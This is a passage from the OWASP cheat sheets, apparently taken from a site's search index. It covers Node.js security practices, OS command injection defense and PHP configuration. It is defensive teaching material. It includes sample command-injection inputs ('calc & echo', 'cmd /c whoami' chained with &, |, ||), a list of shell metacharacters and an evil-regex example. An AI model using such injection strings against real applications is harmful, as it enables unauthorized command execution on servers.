Input validation is a crucial part of application security. Input validation failures can result in many types of application attacks. These include SQL Injection, Cross-Site Scripting, Command Injection, Local/Remote File Inclusion, Denial of Service, Directory Traversal, LDAP Injection and many other injection attacks. In order to avoid these attacks, input to your application should be sanitized first. The best input validation technique is to use a list of accepted inputs. However, if this is not possible, input should be first checked against expected input scheme and dangerous inputs should be escaped. In order to ease input validation in Node.js applications, there are some modules like validator and mongo-express-sanitize. For detailed information on input validation, please refer to Input Validation Cheat Sheet.

JavaScript is a dynamic language and depending on how the framework parses a URL, the data seen by the application code can take many forms. Here are some examples after parsing a query string in express.js:

URL Content of request.query.foo in code ?foo=bar 'bar' (string) ?foo=bar&foo=baz ['bar', 'baz'] (array of string) ?foo[]=bar ['bar'] (array of string) ?foo[]=bar&foo[]=baz ['bar', 'baz'] (array of string) ?foo[bar]=baz { bar : 'baz' } (object with a key) ?foo[]=bar ['bar'] (array of string) ?foo[]baz=bar ['bar'] (array of string - postfix is lost) ?foo[][baz]=bar [ { baz: 'bar' } ] (array of object) ?foo[bar][baz]=bar { foo: { bar: { baz: 'bar' } } } (object tree) ?foo[10]=bar&foo[9]=baz [ 'baz', 'bar' ] (array of string - notice order) ?foo[toString]=bar {} (object where calling toString() will fail)"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#perform-output-escaping","title":"Perform output escaping","text":"

In addition to input validation, you should escape all HTML and JavaScript content shown to users via application in order to prevent cross-site scripting (XSS) attacks. You can use escape-html or node-esapi libraries to perform output escaping.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#perform-application-activity-logging","title":"Perform application activity logging","text":"

Logging application activity is an encouraged good practice. It makes it easier to debug any errors encountered during application runtime. It is also useful for security concerns, since it can be used during incident response. In addition, these logs can be used to feed Intrusion Detection/Prevention Systems (IDS/IPS). In Node.js, there are modules such as Winston, Bunyan, or Pino to perform application activity logging. These modules enable streaming and querying logs, and they provide a way to handle uncaught exceptions.

With the following code, you can log application activities in both console and a desired log file:

const logger = new (Winston.Logger) ({\ntransports: [\nnew (winston.transports.Console)(),\nnew (winston.transports.File)({ filename: 'application.log' })\n],\nlevel: 'verbose'\n});\n

You can provide different transports so that you can save errors to a separate log file and general application logs to a different log file. Additional information on security logging can be found in Logging Cheat Sheet.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#monitor-the-event-loop","title":"Monitor the event loop","text":"

When your application server is under heavy network traffic, it may not be able to serve its users. This is essentially a type of Denial of Service (DoS) attack. The toobusy-js module allows you to monitor the event loop. It keeps track of the response time, and when it goes beyond a certain threshold, this module can indicate your server is too busy. In that case, you can stop processing incoming requests and send them 503 Server Too Busy message so that your application stay responsive. Example use of the toobusy-js module is shown here:

const toobusy = require('toobusy-js');\nconst express = require('express');\nconst app = express();\napp.use(function(req, res, next) {\nif (toobusy()) {\n// log if you see necessary\nres.status(503).send(\"Server Too Busy\");\n} else {\nnext();\n}\n});\n
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#take-precautions-against-brute-forcing","title":"Take precautions against brute-forcing","text":"

Brute-forcing is a common threat to all web applications. Attackers can use brute-forcing as a password guessing attack to obtain account passwords. Therefore, application developers should take precautions against brute-force attacks especially in login pages. Node.js has several modules available for this purpose. Express-bouncer, express-brute and rate-limiter are just some examples. Based on your needs and requirements, you should choose one or more of these modules and use accordingly. Express-bouncer and express-brute modules work similarly. They increase the delay for each failed request and can be arranged for a specific route. These modules can be used as follows:

const bouncer = require('express-bouncer');\nbouncer.whitelist.push('127.0.0.1'); // allow an IP address\n// give a custom error message\nbouncer.blocked = function (req, res, next, remaining) {\nres.status(429).send(\"Too many requests have been made. Please wait \" + remaining/1000 + \" seconds.\");\n};\n// route to protect\napp.post(\"/login\", bouncer.block, function(req, res) {\nif (LoginFailed){  }\nelse {\nbouncer.reset( req );\n}\n});\n
const ExpressBrute = require('express-brute');\n\nconst store = new ExpressBrute.MemoryStore(); // stores state locally, don't use this in production\nconst bruteforce = new ExpressBrute(store);\n\napp.post('/auth',\nbruteforce.prevent, // error 429 if we hit this route too often\nfunction (req, res, next) {\nres.send('Success!');\n}\n);\n

Apart from express-bouncer and express-brute, the rate-limiter module can also help to prevent brute-forcing attacks. It enables specifying how many requests a specific IP address can make during a specified time period.

const limiter = new RateLimiter();\nlimiter.addLimit('/login', 'GET', 5, 500); // login page can be requested 5 times at max within 500 seconds\n

CAPTCHA usage is also another common mechanism used against brute-forcing. There are modules developed for Node.js CAPTCHAs. A common module used in Node.js applications is svg-captcha. It can be used as follows:

const svgCaptcha = require('svg-captcha');\napp.get('/captcha', function (req, res) {\nconst captcha = svgCaptcha.create();\nreq.session.captcha = captcha.text;\nres.type('svg');\nres.status(200).send(captcha.data);\n});\n

Account lockout is a recommended solution to keep attackers away from your valid users. Account lockout is possible with many modules like mongoose. You can refer to this blog post to see how account lockout is implemented in mongoose.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#use-anti-csrf-tokens","title":"Use Anti-CSRF tokens","text":"

Cross-Site Request Forgery (CSRF) aims to perform authorized actions on behalf of an authenticated user, while the user is unaware of this action. CSRF attacks are generally performed for state-changing requests like changing a password, adding users or placing orders. Csurf is an express middleware that has been used to mitigate CSRF attacks. But a security hole in this package has been recently discovered. The team behind the package has not fixed the discovered vulnerability and they have marked the package as deprecated, recommending using any other CSRF protection package.

For detailed information on cross-site request forgery (CSRF) attacks and prevention methods, you can refer to Cross-Site Request Forgery Prevention.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#remove-unnecessary-routes","title":"Remove unnecessary routes","text":"

A web application should not contain any page that is not used by users, as it may increase the attack surface of the application. Therefore, all unused API routes should be disabled in Node.js applications. This occurs especially in frameworks like Sails and Feathers, as they automatically generate REST API endpoints. For example, in Sails, if a URL does not match a custom route, it may match one of the automatic routes and still generate a response. This situation may lead to results ranging from information leakage to arbitrary command execution. Therefore, before using such frameworks and modules, it is important to know the routes they automatically generate and remove or disable these routes.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#prevent-http-parameter-pollution","title":"Prevent HTTP Parameter Pollution","text":"

HTTP Parameter Pollution(HPP) is an attack in which attackers send multiple HTTP parameters with the same name and this causes your application to interpret them unpredictably. When multiple parameter values are sent, Express populates them in an array. In order to solve this issue, you can use hpp module. When used, this module will ignore all values submitted for a parameter in req.query and/or req.body and just select the last parameter value submitted. You can use it as follows:

const hpp = require('hpp');\napp.use(hpp());\n
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#only-return-what-is-necessary","title":"Only return what is necessary","text":"

Information about the users of an application is among the most critical information about the application. User tables generally include fields like id, username, full name, email address, birth date, password and in some cases social security numbers. Therefore, when querying and using user objects, you need to return only needed fields as it may be vulnerable to personal information disclosure. This is also correct for other objects stored on the database. If you just need a certain field of an object, you should only return the specific fields required. As an example, you can use a function like the following whenever you need to get information on a user. By doing so, you can only return the fields that are needed for your specific operation. In other words, if you only need to list names of the users available, you are not returning their email addresses or credit card numbers in addition to their full names.

exports.sanitizeUser = function(user) {\nreturn {\nid: user.id,\nusername: user.username,\nfullName: user.fullName\n};\n};\n
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#use-object-property-descriptors","title":"Use object property descriptors","text":"

Object properties include three hidden attributes: writable (if false, property value cannot be changed), enumerable (if false, property cannot be used in for loops) and configurable (if false, property cannot be deleted). When defining an object property through assignment, these three hidden attributes are set to true by default. These properties can be set as follows:

const o = {};\nObject.defineProperty(o, \"a\", {\nwritable: true,\nenumerable: true,\nconfigurable: true,\nvalue: \"A\"\n});\n

Apart from these, there are some special functions for object attributes. Object.preventExtensions() prevents new properties from being added to the object.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#use-access-control-lists","title":"Use access control lists","text":"

Authorization prevents users from acting outside of their intended permissions. In order to do so, users and their roles should be determined with consideration of the principle of least privilege. Each user role should only have access to the resources they must use. For your Node.js applications, you can use the acl module to provide ACL (access control list) implementation. With this module, you can create roles and assign users to these roles.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#error-exception-handling","title":"Error & Exception Handling","text":""},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#handle-uncaughtexception","title":"Handle uncaughtException","text":"

Node.js behavior for uncaught exceptions is to print current stack trace and then terminate the thread. However, Node.js allows customization of this behavior. It provides a global object named process that is available to all Node.js applications. It is an EventEmitter object and in case of an uncaught exception, uncaughtException event is emitted and it is brought up to the main event loop. In order to provide a custom behavior for uncaught exceptions, you can bind to this event. However, resuming the application after such an uncaught exception can lead to further problems. Therefore, if you do not want to miss any uncaught exception, you should bind to uncaughtException event and cleanup any allocated resources like file descriptors, handles and similar before shutting down the process. Resuming the application is strongly discouraged as the application will be in an unknown state. It is important to note that when displaying error messages to the user in case of an uncaught exception, detailed information like stack traces should not be revealed to the user. Instead, custom error messages should be shown to the users in order not to cause any information leakage.

process.on(\"uncaughtException\", function(err) {\n// clean up allocated resources\n// log necessary error details to log files\nprocess.exit(); // exit the process to avoid unknown state\n});\n
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#listen-to-errors-when-using-eventemitter","title":"Listen to errors when using EventEmitter","text":"

When using EventEmitter, errors can occur anywhere in the event chain. Normally, if an error occurs in an EventEmitter object, an error event that has an Error object as an argument is called. However, if there are no attached listeners to that error event, the Error object that is sent as an argument is thrown and becomes an uncaught exception. In short, if you do not handle errors within an EventEmitter object properly, these unhandled errors may crash your application. Therefore, you should always listen to error events when using EventEmitter objects.

const events = require('events');\nconst myEventEmitter = function(){\nevents.EventEmitter.call(this);\n}\nrequire('util').inherits(myEventEmitter, events.EventEmitter);\nmyEventEmitter.prototype.someFunction = function(param1, param2) {\n//in case of an error\nthis.emit('error', err);\n}\nconst emitter = new myEventEmitter();\nemitter.on('error', function(err){\n//Perform necessary error handling here\n});\n
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#handle-errors-in-asynchronous-calls","title":"Handle errors in asynchronous calls","text":"

Errors that occur within asynchronous callbacks are easy to miss. Therefore, as a general principle first argument to the asynchronous calls should be an Error object. Also, express routes handle errors itself, but it should be always remembered that errors occurred in asynchronous calls made within express routes are not handled, unless an Error object is sent as a first argument.

Errors in these callbacks can be propagated as many times as possible. Each callback that the error has been propagated to can ignore, handle or propagate the error.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#server-security","title":"Server Security","text":""},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-cookie-flags-appropriately","title":"Set cookie flags appropriately","text":"

Generally, session information is sent using cookies in web applications. However, improper use of HTTP cookies can render an application to several session management vulnerabilities. Some flags can be set for each cookie to prevent these kinds of attacks. httpOnly, Secure and SameSite flags are very important for session cookies. httpOnly flag prevents the cookie from being accessed by client-side JavaScript. This is an effective counter-measure for XSS attacks. Secure flag lets the cookie to be sent only if the communication is over HTTPS. SameSite flag can prevent cookies from being sent in cross-site requests that helps protect against Cross-Site Request Forgery (CSRF) attacks. Apart from these, there are other flags like domain, path and expires. Setting these flags appropriately is encouraged, but they are mostly related to cookie scope not the cookie security. Sample usage of these flags is given in the following example:

const session = require('express-session');\napp.use(session({\nsecret: 'your-secret-key',\nname: 'cookieName',\ncookie: { secure: true, httpOnly: true, path: '/user', sameSite: true}\n}));\n
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#use-appropriate-security-headers","title":"Use appropriate security headers","text":"

There are several HTTP security headers that can help you prevent some common attack vectors. The helmet package can help to set those headers:

const express = require(\"express\");\nconst helmet = require(\"helmet\");\n\nconst app = express();\n\napp.use(helmet()); // Add various HTTP headers\n

The top-level helmet function is a wrapper around 14 smaller middlewares. Bellow is a list of HTTP security headers covered by helmet middlewares:

app.use(helmet.hsts()); // default configuration\napp.use(\nhelmet.hsts({\nmaxAge: 123456,\nincludeSubDomains: false,\n})\n); // custom configuration\n
app.use(helmet.frameguard()); // default behavior (SAMEORIGIN)\n
app.use(helmet.xssFilter()); // sets \"X-XSS-Protection: 0\"\n

For moderns browsers, it is recommended to implement a strong Content-Security-Policy policy, as detailed in the next section.

app.use(\nhelmet.contentSecurityPolicy({\n// the following directives will be merged into the default helmet CSP policy\ndirectives: {\ndefaultSrc: [\"'self'\"],  // default value for all directives that are absent\nscriptSrc: [\"'self'\"],   // helps prevent XSS attacks\nframeAncestors: [\"'none'\"],  // helps prevent Clickjacking attacks\nimgSrc: [\"'self'\", \"'http://imgexample.com'\"],\nstyleSrc: [\"'none'\"]\n}\n})\n);\n

As this middleware performs very little validation, it is recommended to rely on CSP checkers like CSP Evaluator instead.

app.use(helmet.noSniff());\n
const nocache = require(\"nocache\");\n\napp.use(nocache());\n

The above code sets Cache-Control, Surrogate-Control, Pragma and Expires headers accordingly.

app.use(helmet.ieNoOpen());\n
const expectCt = require('expect-ct');\napp.use(expectCt({ maxAge: 123 }));\napp.use(expectCt({ enforce: true, maxAge: 123 }));\napp.use(expectCt({ enforce: true, maxAge: 123, reportUri: 'http://example.com'}));\n
app.use(helmet.hidePoweredBy());\n

Also, you can lie about the technologies used with this header. For example, even if your application does not use PHP, you can set X-Powered-By header to seem so.

app.use(helmet.hidePoweredBy({ setTo: 'PHP 4.2.0' }));\n
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#platform-security","title":"Platform Security","text":""},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#keep-your-packages-up-to-date","title":"Keep your packages up-to-date","text":"

Security of your application depends directly on how secure the third-party packages you use in your application are. Therefore, it is important to keep your packages up-to-date. It should be noted that Using Components with Known Vulnerabilities is still in the OWASP Top 10. You can use OWASP Dependency-Check to see if any of the packages used in the project has a known vulnerability. Also, you can use Retire.js to check JavaScript libraries with known vulnerabilities.

Starting with version 6, npm introduced audit, which will warn about vulnerable packages:

npm audit\n

npm also introduced a simple way to upgrade the affected packages:

npm audit fix\n

There are several other tools you can use to check your dependencies. A more comprehensive list can be found in Vulnerable Dependency Management CS.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#do-not-use-dangerous-functions","title":"Do not use dangerous functions","text":"

There are some JavaScript functions that are dangerous and should only be used where necessary or unavoidable. The first example is the eval() function. This function takes a string argument and executes it as any other JavaScript source code. Combined with user input, this behavior inherently leads to remote code execution vulnerability. Similarly, calls to child_process.exec are also very dangerous. This function acts as a bash interpreter and sends its arguments to /bin/sh. By injecting input to this function, attackers can execute arbitrary commands on the server.

In addition to these functions, some modules require special care when being used. As an example, fs module handles filesystem operations. However, if improperly sanitized user input is fed into this module, your application may become vulnerable to file inclusion and directory traversal vulnerabilities. Similarly, vm module provides APIs for compiling and running code within V8 Virtual Machine contexts. Since it can perform dangerous actions by nature, it should be used within a sandbox.

It would not be fair to say that these functions and modules should not be used whatsoever, however, they should be used carefully especially when they use with user input. Also, there are some other functions that may render your application vulnerable.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#stay-away-from-evil-regexes","title":"Stay away from evil regexes","text":"

The Regular expression Denial of Service (ReDoS) is a Denial of Service attack, that exploits the fact that most Regular Expression implementations may reach extreme situations that cause them to work very slowly (exponentially related to input size). An attacker can then cause a program using a Regular Expression to enter these extreme situations and then hang for a very long time.

The Regular Expression Denial of Service (ReDoS) is a type of Denial of Service attack that uses regular expressions. Some Regular Expression (Regex) implementations cause extreme situations that makes the application very slow. Attackers can use such regex implementations to cause application to get into these extreme situations and hang for a long time. Such regexes are called evil if application can be stuck on crafted input. Generally, these regexes are exploited by grouping with repetition and alternation with overlapping. For example, the following regular expression ^(([a-z])+.)+[A-Z]([a-z])+$ can be used to specify Java class names. However, a very long string (aaaa...aaaaAaaaaa...aaaa) can also match with this regular expression. There are some tools to check if a regex has a potential for causing denial of service. One example is vuln-regex-detector.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#run-security-linters","title":"Run security linters","text":"

When developing code, keeping all security tips in mind can be really difficult. Also, keeping all team members obey these rules is nearly impossible. This is why there are Static Analysis Security Testing (SAST) tools. These tools do not execute your code, but they simply look for patterns that can contain security risks. As JavaScript is a dynamic and loosely-typed language, linting tools are really essential in the software development life cycle. The linting rules should be reviewed periodically and the findings should be audited. Another advantage of these tools is the feature that you can add custom rules for patterns that you may see dangerous. ESLint and JSHint are commonly used SAST tools for JavaScript linting.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#use-strict-mode","title":"Use strict mode","text":"

JavaScript has a number of unsafe and dangerous legacy features that should not be used. In order to remove these features, ES5 included a strict mode for developers. With this mode, errors that were silent previously are thrown. It also helps JavaScript engines perform optimizations. With strict mode, previously accepted bad syntax causes real errors. Because of these improvements, you should always use strict mode in your application. In order to enable strict mode, you just need to write \"use strict\"; on top of your code.

The following code will generate a ReferenceError: Can't find variable: y on the console, which will not be displayed unless strict mode is used:

\"use strict\";\n\nfunc();\nfunction func() {\ny = 3.14;   // This will cause an error (y is not defined)\n}\n
"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#adhere-to-general-application-security-principles","title":"Adhere to general application security principles","text":"

This list mainly focuses on issues that are common in Node.js applications, with recommendations and examples. In addition to these, there are general security by design principles that apply to web applications regardless of technologies used in application server. You should also keep those principles in mind while developing your applications. You can always refer to OWASP Cheat Sheet Series to learn more about web application vulnerabilities and mitigation techniques used against them.

"},{"location":"cheatsheets/Nodejs_Security_Cheat_Sheet.html#additional-resources-about-nodejs-security","title":"Additional resources about Node.js security","text":"

Awesome Node.js Security resources

"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html","title":"OS Command Injection Defense Cheat Sheet","text":""},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Command injection (or OS Command Injection) is a type of injection where software that constructs a system command using externally influenced input does not correctly neutralize the input from special elements that can modify the initially intended command.

For example, if the supplied value is:

calc\n

when typed in a Windows command prompt, the application Calculator is displayed.

However, if the supplied value has been tampered with, and now it is:

calc & echo \"test\"\n

when executed, it changes the meaning of the initial intended value.

Now, both the Calculator application and the value test are displayed:

The problem is exacerbated if the compromised process does not follow the principle of least privileges and attacker-controlled commands end up running with special system privileges that increase the amount of damage.

"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#argument-injection","title":"Argument Injection","text":"

Every OS Command Injection is also an Argument Injection. In this type of attacks, user input can be passed as arguments while executing a specific command.

For example, if the user input is passed through an escape function to escape certain characters like &, |, ;, etc.

system(\"curl \" . escape($url));\n

which will prevent an attacker to run other commands.

However, if the attacker controlled string contains an additional argument of the curl command:

system(\"curl \" . escape(\"--help\"))\n

Now when the above code is executed, it will show the output of curl --help.

Depending upon the system command used, the impact of an Argument injection attack can range from Information Disclosure to critical Remote Code Execution.

"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#primary-defenses","title":"Primary Defenses","text":""},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#defense-option-1-avoid-calling-os-commands-directly","title":"Defense Option 1: Avoid calling OS commands directly","text":"

The primary defense is to avoid calling OS commands directly. Built-in library functions are a very good alternative to OS Commands, as they cannot be manipulated to perform tasks other than those it is intended to do.

For example use mkdir() instead of system(\"mkdir /dir_name\").

If there are available libraries or APIs for the language you use, this is the preferred method.

"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#defense-option-2-escape-values-added-to-os-commands-specific-to-each-os","title":"Defense option 2: Escape values added to OS commands specific to each OS","text":"

TODO: To enhance.

For examples, see escapeshellarg() in PHP.

The escapeshellarg() surrounds the user input in single quotes, so if the malformed user input is something like & echo \"hello\", the final output will be like calc '& echo \"hello\"' which will be parsed as a single argument to the command calc.

Even though escapeshellarg() prevents OS Command Injection, an attacker can still pass a single argument to the command.

"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#defense-option-3-parameterization-in-conjunction-with-input-validation","title":"Defense option 3: Parameterization in conjunction with Input Validation","text":"

If calling a system command that incorporates user-supplied cannot be avoided, the following two layers of defense should be used within software to prevent attacks:

"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#layer-1","title":"Layer 1","text":"

Parameterization: If available, use structured mechanisms that automatically enforce the separation between data and command. These mechanisms can help provide the relevant quoting and encoding.

"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#layer-2","title":"Layer 2","text":"

Input validation: The values for commands and the relevant arguments should be both validated. There are different degrees of validation for the actual command and its arguments:

Note A:

& |  ; $ > < ` \\ ! ' \" ( )\n
"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#additional-defenses","title":"Additional Defenses","text":"

On top of primary defenses, parameterizations, and input validation, we also recommend adopting all of these additional defenses to provide defense in depth.

These additional defenses are:

"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#code-examples","title":"Code examples","text":""},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#java","title":"Java","text":"

In Java, use ProcessBuilder and the command must be separated from its arguments.

Note about the Java's Runtime.exec method behavior:

There are many sites that will tell you that Java's Runtime.exec is exactly the same as C's system function. This is not true. Both allow you to invoke a new program/process.

However, C's system function passes its arguments to the shell (/bin/sh) to be parsed, whereas Runtime.exec tries to split the string into an array of words, then executes the first word in the array with the rest of the words as parameters.

Runtime.exec does NOT try to invoke the shell at any point and does not support shell metacharacters.

The key difference is that much of the functionality provided by the shell that could be used for mischief (chaining commands using &, &&, |, ||, etc, redirecting input and output) would simply end up as a parameter being passed to the first command, likely causing a syntax error or being thrown out as an invalid parameter.

Code to test the note above:

String[] specialChars = new String[]{\"&\", \"&&\", \"|\", \"||\"};\nString payload = \"cmd /c whoami\";\nString cmdTemplate = \"java -version %s \" + payload;\nString cmd;\nProcess p;\nint returnCode;\nfor (String specialChar : specialChars) {\ncmd = String.format(cmdTemplate, specialChar);\nSystem.out.printf(\"#### TEST CMD: %s\\n\", cmd);\np = Runtime.getRuntime().exec(cmd);\nreturnCode = p.waitFor();\nSystem.out.printf(\"RC    : %s\\n\", returnCode);\nSystem.out.printf(\"OUT   :\\n%s\\n\", IOUtils.toString(p.getInputStream(),\n\"utf-8\"));\nSystem.out.printf(\"ERROR :\\n%s\\n\", IOUtils.toString(p.getErrorStream(),\n\"utf-8\"));\n}\nSystem.out.printf(\"#### TEST PAYLOAD ONLY: %s\\n\", payload);\np = Runtime.getRuntime().exec(payload);\nreturnCode = p.waitFor();\nSystem.out.printf(\"RC    : %s\\n\", returnCode);\nSystem.out.printf(\"OUT   :\\n%s\\n\", IOUtils.toString(p.getInputStream(),\n\"utf-8\"));\nSystem.out.printf(\"ERROR :\\n%s\\n\", IOUtils.toString(p.getErrorStream(),\n\"utf-8\"));\n

Result of the test:

##### TEST CMD: java -version & cmd /c whoami\nRC    : 0\nOUT   :\n\nERROR :\njava version \"1.8.0_31\"\n\n##### TEST CMD: java -version && cmd /c whoami\nRC    : 0\nOUT   :\n\nERROR :\njava version \"1.8.0_31\"\n\n##### TEST CMD: java -version | cmd /c whoami\nRC    : 0\nOUT   :\n\nERROR :\njava version \"1.8.0_31\"\n\n##### TEST CMD: java -version || cmd /c whoami\nRC    : 0\nOUT   :\n\nERROR :\njava version \"1.8.0_31\"\n\n##### TEST PAYLOAD ONLY: cmd /c whoami\nRC    : 0\nOUT   :\nmydomain\\simpleuser\n\nERROR :\n

Incorrect usage:

ProcessBuilder b = new ProcessBuilder(\"C:\\DoStuff.exe -arg1 -arg2\");\n

In this example, the command together with the arguments are passed as a one string, making it easy to manipulate that expression and inject malicious strings.

Correct Usage:

Here is an example that starts a process with a modified working directory. The command and each of the arguments are passed separately. This makes it easy to validate each term and reduces the risk of malicious strings being inserted.

ProcessBuilder pb = new ProcessBuilder(\"TrustedCmd\", \"TrustedArg1\", \"TrustedArg2\");\n\nMap<String, String> env = pb.environment();\n\npb.directory(new File(\"TrustedDir\"));\n\nProcess p = pb.start();\n
"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#net","title":".Net","text":"

See relevant details in the DotNet Security Cheat Sheet

"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#php","title":"PHP","text":"

In PHP use escapeshellarg() or escapeshellcmd() rather than exec(), system(), passthru().

"},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#related-articles","title":"Related articles","text":""},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#description-of-command-injection-vulnerability","title":"Description of Command Injection Vulnerability","text":""},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#how-to-avoid-vulnerabilities","title":"How to Avoid Vulnerabilities","text":""},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#how-to-review-code","title":"How to Review Code","text":""},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#how-to-test","title":"How to Test","text":""},{"location":"cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html#external-references","title":"External References","text":""},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html","title":"PHP Configuration Cheat Sheet","text":""},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This page is meant to help those configuring PHP and the web server it is running on to be very secure.

Below you will find information on the proper settings for the php.ini file and instructions on configuring Apache, Nginx, and Caddy web servers.

For general PHP codebase security please refer to the two following great guides:

"},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#php-configuration-and-deployment","title":"PHP Configuration and Deployment","text":""},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#phpini","title":"php.ini","text":"

Some of following settings need to be adapted to your system, in particular session.save_path, session.cookie_path (e.g. /var/www/mysite), and session.cookie_domain (e.g. ExampleSite.com).

You should also be running PHP 7.2 or later. If running PHP 7.0 and 7.1, you will use slightly different values in a couple of places below (see inline comments). Finally look through the PHP Manual for a complete reference on every value in the php.ini configuration file.

You can find a copy of the following values in a ready-to-go php.ini file here.

"},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#php-error-handling","title":"PHP error handling","text":"
expose_php\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0Off\nerror_reporting\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0E_ALL\ndisplay_errors\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0Off\ndisplay_startup_errors\u00a0\u00a0=\u00a0Off\nlog_errors\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0On\nerror_log\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0/valid_path/PHP-logs/php_error.log\nignore_repeated_errors\u00a0\u00a0=\u00a0Off\n

Keep in mind that you need to have display_errors to Off on a production server and it's a good idea to frequently notice the logs.

"},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#php-general-settings","title":"PHP general settings","text":"
doc_root\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0/path/DocumentRoot/PHP-scripts/\nopen_basedir\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0/path/DocumentRoot/PHP-scripts/\ninclude_path\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0/path/PHP-pear/\nextension_dir\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0/path/PHP-extensions/\nmime_magic.magicfile\u00a0\u00a0\u00a0\u00a0=\u00a0/path/PHP-magic.mime\nallow_url_fopen\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0Off\nallow_url_include\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0Off\nvariables_order\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0\"GPCS\"\nallow_webdav_methods\u00a0\u00a0\u00a0\u00a0=\u00a0Off\nsession.gc_maxlifetime\u00a0\u00a0=\u00a0600\n

allow_url_* prevents LFIs to be easily escalated to RFIs.

"},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#php-file-upload-handling","title":"PHP file upload handling","text":"
file_uploads\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0On\nupload_tmp_dir\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a0/path/PHP-uploads/\nupload_max_filesize\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a02M\nmax_file_uploads\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0=\u00a02\n

If your application is not using file uploads, and say the only data the user will enter / upload is forms that do not require any document attachments, file_uploads should be turned Off.

"},{"location":"cheatsheets/PHP_Configuration_Cheat_Sheet.html#php-executable-handling","title":"PHP executable handling","text":"
